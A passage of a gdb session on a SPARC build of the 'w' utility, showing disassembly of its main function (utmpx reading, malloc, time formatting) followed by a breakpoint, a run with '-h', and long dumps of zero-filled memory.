0x11074 <main+432>: call 0x224b4 <stat>
0x11078 <main+436>: add %fp, -136, %o1
0x1107c <main+440>: cmp %o0, -1
0x11080 <main+444>: be 0x1196c <main+2728>
0x11084 <main+448>: ld [ %fp + -88 ], %o0
0x11088 <main+452>: sethi %hi(0xb02c0800), %g2
0x1108c <main+456>: call 0x224c0 <.umul>
0x11090 <main+460>: add %g2, 0x303, %o1 ! 0xb02c0b03
0x11094 <main+464>: srl %o1, 8, %g2
0x11098 <main+468>: sll %g2, 5, %g3
0x1109c <main+472>: sub %g3, %g2, %g2
0x110a0 <main+476>: sll %g2, 2, %g3
0x110a4 <main+480>: sub %g3, %g2, %g2
0x110a8 <main+484>: sll %g2, 2, %i1
0x110ac <main+488>: call 0x224cc <malloc>
0x110b0 <main+492>: mov %i1, %o0
0x110b4 <main+496>: orcc %g0, %o0, %i0
0x110b8 <main+500>: be 0x119bc <main+2808>
0x110bc <main+504>: mov %o0, %i3
0x110c0 <main+508>: sethi %hi(0x12000), %g2
0x110c4 <main+512>: call 0x224d8 <utmpxname>
0x110c8 <main+516>: add %g2, 0x224, %o0 ! 0x12224 <_lib_version+148>
0x110cc <main+520>: call 0x224e4 <setutxent>
---Type <return> to continue, or q <return> to quit---
0x110d0 <main+524>: add %i0, %i1, %i2
0x110d4 <main+528>: call 0x224f0 <getutxent>
0x110d8 <main+532>: nop
0x110dc <main+536>: orcc %g0, %o0, %o1
0x110e0 <main+540>: mov %i0, %i4
0x110e4 <main+544>: be 0x1110c <main+584>
0x110e8 <main+548>: mov %i3, %o0
0x110ec <main+552>: call 0x224fc <memcpy>
0x110f0 <main+556>: mov 0x174, %o2
0x110f4 <main+560>: call 0x224f0 <getutxent>
0x110f8 <main+564>: nop
0x110fc <main+568>: orcc %g0, %o0, %o1
0x11100 <main+572>: add %i3, 0x174, %i3
0x11104 <main+576>: bne 0x110ec <main+552>
0x11108 <main+580>: mov %i3, %o0
0x1110c <main+584>: call 0x22508 <endutxent>
0x11110 <main+588>: nop
0x11114 <main+592>: sethi %hi(0x22800), %o0
0x11118 <main+596>: mov %i4, %l1
0x1111c <main+600>: add %o0, 0x1e8, %i0
0x11120 <main+604>: call 0x22514 <time>
0x11124 <main+608>: mov %i0, %o0
0x11128 <main+612>: sethi %hi(0x22400), %g2
0x1112c <main+616>: ld [ %g2 + 0x360 ], %g2 ! 0x22760 <___Argv+4>
0x11130 <main+620>: cmp %g2, 0
0x11134 <main+624>: be 0x113c8 <main+1284>
0x11138 <main+628>: sethi %hi(0x12000), %g2
0x1113c <main+632>: call 0x11e80 <main+4028>
0x11140 <main+636>: mov %i0, %o0
0x11144 <main+640>: cmp %i4, %i2
0x11148 <main+644>: bcc 0x112f4 <main+1072>
0x1114c <main+648>: sethi %hi(0x22800), %i0
0x11150 <main+652>: ldsh [ %l1 + 0x48 ], %o0
---Type <return> to continue, or q <return> to quit---
0x11154 <main+656>: sethi %hi(0x15000), %g2
0x11158 <main+660>: add %g2, 0x180, %i5 ! 0x15180
0x1115c <main+664>: cmp %o0, 7
0x11160 <main+668>: bne 0x11190 <main+716>
0x11164 <main+672>: cmp %o0, 2
0x11168 <main+676>: ldsh [ %l1 + 0x4c ], %g2
0x1116c <main+680>: cmp %g2, 2
0x11170 <main+684>: be,a 0x112e4 <main+1056>
0x11174 <main+688>: add %l1, 0x174, %l1
0x11178 <main+692>: sethi %hi(0x22800), %g2
0x1117c <main+696>: ld [ %g2 + 0x1e0 ], %g3 ! 0x229e0 <_edata+550>
0x11180 <main+700>: inc %g3
0x11184 <main+704>: st %g3, [ %g2 + 0x1e0 ]
0x11188 <main+708>: b 0x112e4 <main+1056>
0x1118c <main+712>: add %l1, 0x174, %l1
0x11190 <main+716>: bne,a 0x112e4 <main+1056>
0x11194 <main+720>: add %l1, 0x174, %l1
0x11198 <main+724>: sethi %hi(0x22800), %g2
0x1119c <main+728>: ld [ %l1 + 0x50 ], %g3
0x111a0 <main+732>: ld [ %g2 + 0x1e8 ], %g2
0x111a4 <main+736>: sub %g2, %g3, %g2
0x111a8 <main+740>: add %g2, 0x1e, %l0
0x111ac <main+744>: mov %l0, %o0
0x111b0 <main+748>: call 0x22520 <.div>
0x111b4 <main+752>: mov %i5, %o1
0x111b8 <main+756>: sll %o0, 4, %g2
0x111bc <main+760>: mov %o0, %i3
0x111c0 <main+764>: add %g2, %o0, %g2
0x111c4 <main+768>: sll %g2, 3, %g2
0x111c8 <main+772>: sub %g2, %o0, %g2
0x111cc <main+776>: sll %g2, 2, %g3
0x111d0 <main+780>: add %g3, %g2, %g2
0x111d4 <main+784>: sll %g2, 7, %g2
---Type <return> to continue, or q <return> to quit---
0x111d8 <main+788>: sub %l0, %g2, %l0
0x111dc <main+792>: sethi %hi(0x91a2b000), %g2
0x111e0 <main+796>: mov %l0, %o0
0x111e4 <main+800>: call 0x2252c <.mul>
0x111e8 <main+804>: add %g2, 0x3c5, %o1
0x111ec <main+808>: add %l0, %o1, %g2
0x111f0 <main+812>: sra %l0, 0x1f, %g3
0x111f4 <main+816>: sra %g2, 0xb, %g2
0x111f8 <main+820>: sub %g2, %g3, %i1
0x111fc <main+824>: sll %i1, 3, %g2
0x11200 <main+828>: sub %g2, %i1, %g2
0x11204 <main+832>: sll %g2, 5, %g2
0x11208 <main+836>: add %i1, %g2, %g2
0x1120c <main+840>: sll %g2, 4, %g2
0x11210 <main+844>: sub %l0, %g2, %l0
0x11214 <main+848>: sethi %hi(0x88888800), %g2
0x11218 <main+852>: mov %l0, %o0
0x1121c <main+856>: call 0x2252c <.mul>
0x11220 <main+860>: add %g2, 0x89, %o1
0x11224 <main+864>: add %l0, %o1, %g2
0x11228 <main+868>: sra %g2, 5, %g2
0x1122c <main+872>: sra %l0, 0x1f, %g3
0x11230 <main+876>: sub %g2, %g3, %i0
0x11234 <main+880>: sethi %hi(0x22800), %g2
0x11238 <main+884>: st %l0, [ %g2 + 0x1e4 ] ! 0x229e4 <_edata+554>
0x1123c <main+888>: sethi %hi(0x12000), %g2
0x11240 <main+892>: call 0x22538 <gettext>
0x11244 <main+896>: add %g2, 0x234, %o0 ! 0x12234 <_lib_version+164>
0x11248 <main+900>: call 0x22544 <printf>
0x1124c <main+904>: nop
0x11250 <main+908>: cmp %i3, 0
0x11254 <main+912>: ble 0x11274 <main+944>
0x11258 <main+916>: cmp %i1, 0
---Type <return> to continue, or q <return> to quit---
0x1125c <main+920>: sethi %hi(0x12000), %g2
0x11260 <main+924>: call 0x22538 <gettext>
0x11264 <main+928>: add %g2, 0x23c, %o0 ! 0x1223c <_lib_version+172>
0x11268 <main+932>: call 0x22544 <printf>
0x1126c <main+936>: mov %i3, %o1
0x11270 <main+940>: cmp %i1, 0
0x11274 <main+944>: ble 0x112a0 <main+988>
0x11278 <main+948>: cmp %i0, 0
0x1127c <main+952>: sethi %hi(0x12000), %g2
0x11280 <main+956>: ble 0x112a4 <main+992>
0x11284 <main+960>: cmp %i1, 0
0x11288 <main+964>: add %g2, 0x248, %o0
0x1128c <main+968>: mov %i1, %o1
0x11290 <main+972>: call 0x22544 <printf>
0x11294 <main+976>: mov %i0, %o2
0x11298 <main+980>: b 0x112e4 <main+1056>
0x1129c <main+984>: add %l1, 0x174, %l1
0x112a0 <main+988>: cmp %i1, 0
0x112a4 <main+992>: ble 0x112c4 <main+1024>
0x112a8 <main+996>: cmp %i0, 0
0x112ac <main+1000>: sethi %hi(0x12000), %g2
0x112b0 <main+1004>: call 0x22538 <gettext>
0x112b4 <main+1008>: add %g2, 0x254, %o0 ! 0x12254 <_lib_version+196>
0x112b8 <main+1012>: call 0x22544 <printf>
0x112bc <main+1016>: mov %i1, %o1
0x112c0 <main+1020>: cmp %i0, 0
0x112c4 <main+1024>: ble,a 0x112e4 <main+1056>
0x112c8 <main+1028>: add %l1, 0x174, %l1
0x112cc <main+1032>: sethi %hi(0x12000), %g2
0x112d0 <main+1036>: call 0x22538 <gettext>
0x112d4 <main+1040>: add %g2, 0x260, %o0 ! 0x12260 <_lib_version+208>
0x112d8 <main+1044>: call 0x22544 <printf>
0x112dc <main+1048>: mov %i0, %o1
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r -h
Starting program: /home/bazz/w_32 -h
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/96x 0x23000
0x23000 <_edata+2118>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23010 <_edata+2134>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23020 <_edata+2150>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23030 <_edata+2166>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23040 <_edata+2182>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23050 <_edata+2198>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23060 <_edata+2214>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23070 <_edata+2230>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23080 <_edata+2246>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23090 <_edata+2262>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230a0 <_edata+2278>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230b0 <_edata+2294>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230c0 <_edata+2310>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230d0 <_edata+2326>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230e0 <_edata+2342>: 0x00000000 0x00000000 0x00000000 0x00000000
0x230f0 <_edata+2358>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23100 <_edata+2374>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23110 <_edata+2390>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23120 <_edata+2406>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23130 <_edata+2422>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23140 <_edata+2438>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23150 <_edata+2454>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23160 <_edata+2470>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23170 <_edata+2486>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23180 <_edata+2502>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23190 <_edata+2518>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231a0 <_edata+2534>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231b0 <_edata+2550>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231c0 <_edata+2566>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231d0 <_edata+2582>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231e0 <_edata+2598>: 0x00000000 0x00000000 0x00000000 0x00000000
0x231f0 <_edata+2614>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23200 <_edata+2630>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23210 <_edata+2646>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23220 <_edata+2662>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23230 <_edata+2678>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23240 <_edata+2694>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23250 <_edata+2710>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23260 <_edata+2726>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23270 <_edata+2742>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23280 <_edata+2758>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23290 <_edata+2774>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232a0 <_edata+2790>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232b0 <_edata+2806>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232c0 <_edata+2822>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232d0 <_edata+2838>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232e0 <_edata+2854>: 0x00000000 0x00000000 0x00000000 0x00000000
0x232f0 <_edata+2870>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23300 <_edata+2886>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23310 <_edata+2902>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23320 <_edata+2918>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23330 <_edata+2934>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23340 <_edata+2950>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23350 <_edata+2966>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23360 <_edata+2982>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23370 <_edata+2998>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23380 <_edata+3014>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23390 <_edata+3030>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233a0 <_edata+3046>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233b0 <_edata+3062>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233c0 <_edata+3078>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233d0 <_edata+3094>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233e0 <_edata+3110>: 0x00000000 0x00000000 0x00000000 0x00000000
0x233f0 <_edata+3126>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23400 <_edata+3142>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23410 <_edata+3158>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23420 <_edata+3174>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23430 <_edata+3190>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23440 <_edata+3206>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23450 <_edata+3222>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23460 <_edata+3238>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23470 <_edata+3254>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23480 <_edata+3270>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23490 <_edata+3286>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234a0 <_edata+3302>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234b0 <_edata+3318>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234c0 <_edata+3334>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234d0 <_edata+3350>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234e0 <_edata+3366>: 0x00000000 0x00000000 0x00000000 0x00000000
0x234f0 <_edata+3382>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23500 <_edata+3398>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23510 <_edata+3414>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23520 <_edata+3430>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23530 <_edata+3446>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23540 <_edata+3462>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23550 <_edata+3478>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23560 <_edata+3494>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23570 <_edata+3510>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23580 <_edata+3526>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23590 <_edata+3542>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235a0 <_edata+3558>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235b0 <_edata+3574>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235c0 <_edata+3590>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235d0 <_edata+3606>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235e0 <_edata+3622>: 0x00000000 0x00000000 0x00000000 0x00000000
0x235f0 <_edata+3638>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23600 <_edata+3654>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23610 <_edata+3670>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23620 <_edata+3686>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23630 <_edata+3702>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23640 <_edata+3718>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23650 <_edata+3734>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23660 <_edata+3750>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23670 <_edata+3766>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23680 <_edata+3782>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23690 <_edata+3798>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236a0 <_edata+3814>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236b0 <_edata+3830>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236c0 <_edata+3846>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236d0 <_edata+3862>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236e0 <_edata+3878>: 0x00000000 0x00000000 0x00000000 0x00000000
0x236f0 <_edata+3894>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23700 <_edata+3910>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23710 <_edata+3926>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23720 <_edata+3942>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23730 <_edata+3958>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23740 <_edata+3974>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23750 <_edata+3990>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23760 <_edata+4006>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23770 <_edata+4022>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23780 <_edata+4038>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23790 <_edata+4054>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237a0 <_edata+4070>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237b0 <_edata+4086>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237c0 <_edata+4102>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237d0 <_edata+4118>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237e0 <_edata+4134>: 0x00000000 0x00000000 0x00000000 0x00000000
0x237f0 <_edata+4150>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23800 <_edata+4166>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23810 <_edata+4182>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23820 <_edata+4198>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23830 <_edata+4214>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23840 <_edata+4230>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23850 <_edata+4246>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23860 <_edata+4262>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23870 <_edata+4278>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23880 <_edata+4294>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23890 <_edata+4310>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238a0 <_edata+4326>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238b0 <_edata+4342>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238c0 <_edata+4358>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238d0 <_edata+4374>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238e0 <_edata+4390>: 0x00000000 0x00000000 0x00000000 0x00000000
0x238f0 <_edata+4406>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23900 <_edata+4422>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23910 <_edata+4438>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23920 <_edata+4454>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23930 <_edata+4470>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23940 <_edata+4486>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23950 <_edata+4502>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23960 <_edata+4518>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23970 <_edata+4534>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23980 <_edata+4550>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23990 <_edata+4566>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239a0 <_edata+4582>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239b0 <_edata+4598>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239c0 <_edata+4614>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239d0 <_edata+4630>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239e0 <_edata+4646>: 0x00000000 0x00000000 0x00000000 0x00000000
0x239f0 <_edata+4662>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a00 <_edata+4678>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a10 <_edata+4694>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a20 <_edata+4710>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a30 <_edata+4726>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a40 <_edata+4742>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a50 <_edata+4758>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a60 <_edata+4774>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a70 <_edata+4790>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23a80 <_edata+4806>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a90 <_edata+4822>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23aa0 <_edata+4838>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ab0 <_edata+4854>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ac0 <_edata+4870>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ad0 <_edata+4886>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ae0 <_edata+4902>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23af0 <_edata+4918>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b00 <_edata+4934>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b10 <_edata+4950>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b20 <_edata+4966>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b30 <_edata+4982>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b40 <_edata+4998>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b50 <_edata+5014>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b60 <_edata+5030>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b70 <_edata+5046>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b80 <_edata+5062>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b90 <_edata+5078>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ba0 <_edata+5094>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bb0 <_edata+5110>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bc0 <_edata+5126>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bd0 <_edata+5142>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23be0 <_edata+5158>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bf0 <_edata+5174>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23c00 <_edata+5190>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c10 <_edata+5206>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c20 <_edata+5222>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c30 <_edata+5238>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c40 <_edata+5254>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c50 <_edata+5270>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c60 <_edata+5286>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c70 <_edata+5302>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c80 <_edata+5318>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c90 <_edata+5334>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ca0 <_edata+5350>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cb0 <_edata+5366>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cc0 <_edata+5382>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cd0 <_edata+5398>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ce0 <_edata+5414>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cf0 <_edata+5430>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d00 <_edata+5446>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d10 <_edata+5462>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d20 <_edata+5478>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d30 <_edata+5494>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d40 <_edata+5510>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d50 <_edata+5526>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d60 <_edata+5542>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d70 <_edata+5558>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23d80 <_edata+5574>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d90 <_edata+5590>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23da0 <_edata+5606>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23db0 <_edata+5622>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dc0 <_edata+5638>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dd0 <_edata+5654>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23de0 <_edata+5670>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23df0 <_edata+5686>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e00 <_edata+5702>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e10 <_edata+5718>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e20 <_edata+5734>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e30 <_edata+5750>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e40 <_edata+5766>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e50 <_edata+5782>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e60 <_edata+5798>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e70 <_edata+5814>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e80 <_edata+5830>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23e90 <_edata+5846>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ea0 <_edata+5862>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23eb0 <_edata+5878>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ec0 <_edata+5894>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ed0 <_edata+5910>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ee0 <_edata+5926>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ef0 <_edata+5942>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23f00 <_edata+5958>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f10 <_edata+5974>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f20 <_edata+5990>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f30 <_edata+6006>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f40 <_edata+6022>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f50 <_edata+6038>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f60 <_edata+6054>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f70 <_edata+6070>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f80 <_edata+6086>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23f90 <_edata+6102>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fa0 <_edata+6118>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fb0 <_edata+6134>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fc0 <_edata+6150>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fd0 <_edata+6166>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23fe0 <_edata+6182>: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ff0 <_edata+6198>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24000 <_edata+6214>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24010 <_edata+6230>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24020 <_edata+6246>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24030 <_edata+6262>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24040 <_edata+6278>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24050 <_edata+6294>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24060 <_edata+6310>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24070 <_edata+6326>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x24080 <_edata+6342>: 0x00000000 0x00000000 0x00000000 0x00000000
0x24090 <_edata+6358>: 0x00000000 0x00000000 0x00000000 0x00000000
0x240a0 <_edata+6374>: 0x00000000 0x00000000 0x00000000 0x00000000
0x240b0 <_edata+6390>: 0x00000000 0x00000000 0x00000000 0x00000000
0x240c0 <_edata+6406>: 0x00000000 0x00000000 0x00000000 0x00000000
